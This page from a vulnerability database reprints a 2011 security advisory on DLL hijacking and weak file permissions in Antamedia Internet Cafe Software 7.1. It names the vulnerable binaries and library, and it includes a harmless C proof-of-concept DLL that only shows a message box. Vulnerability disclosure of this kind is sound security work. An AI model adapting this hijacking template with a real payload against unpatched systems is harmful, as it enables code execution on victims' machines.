Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Antamedia Internet Cafe Software 7.1 Insecure Permissions/DLL Loading

🗓️ 03 Apr 2011 00:00:00Reported by Gjoko KrsticType 
zeroscience
 zeroscience🔗 www.zeroscience.mk👁 60 Views

Antamedia ICS 7.1 Vulnerability: Insecure Permissions/DLL Loadin

Code
<html><body><p>/*

 Antamedia Internet Cafe Software 7.1 Insecure Permissions/DLL Loading

 Vendor: Antamedia
 Product Web Page: http://www.antamediacafe.com
 Affected Version: 7.1.1.0

 Summary: Internet Cafe Software � Cyber Cafe software is a worldwide top
 selling solution for CyberCafe management and game center control. It
 protects your computers from unauthorized usage and helps with customer
 billing. Many features like POS, print manager, console controller, smart
 cards, credit card billing, makes it suitable for any cyber cafe, hotel,
 airport terminals, game center.

 Desc: Antamedia ICS suffers from a dll hijacking vulnerability and improper
 ACL permissions that enables the attacker to execute arbitrary code or change
 the binary with another of his/her choice because of the (C)Change perm for the
 group Everyone (AICLogin.exe, AICCore.exe). The vulnerable extensions are .fp3
 and .swf thru qwave.dll library.


 Tested on Microsoft Windows XP Professional SP3 (EN)


 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com

 Zero Science Lab - http://www.zeroscience.mk


 Advisory ID: ZSL-2011-5005
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5005.php


 26.03.2011

*/


#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
		dll_mll();
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
	}

	return TRUE;
}

int dll_mll()
{
	MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}</windows.h></p></body></html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Apr 2011 00:00Current
6.2Medium risk
Vulners AI Score6.2
antamediacybercafevulnerabilityinsecure permissionsdll loadingarbitrary codeacldll hijackinggjoko krsticzero science labexploitprivilege escalationsystem accesswindows xp
60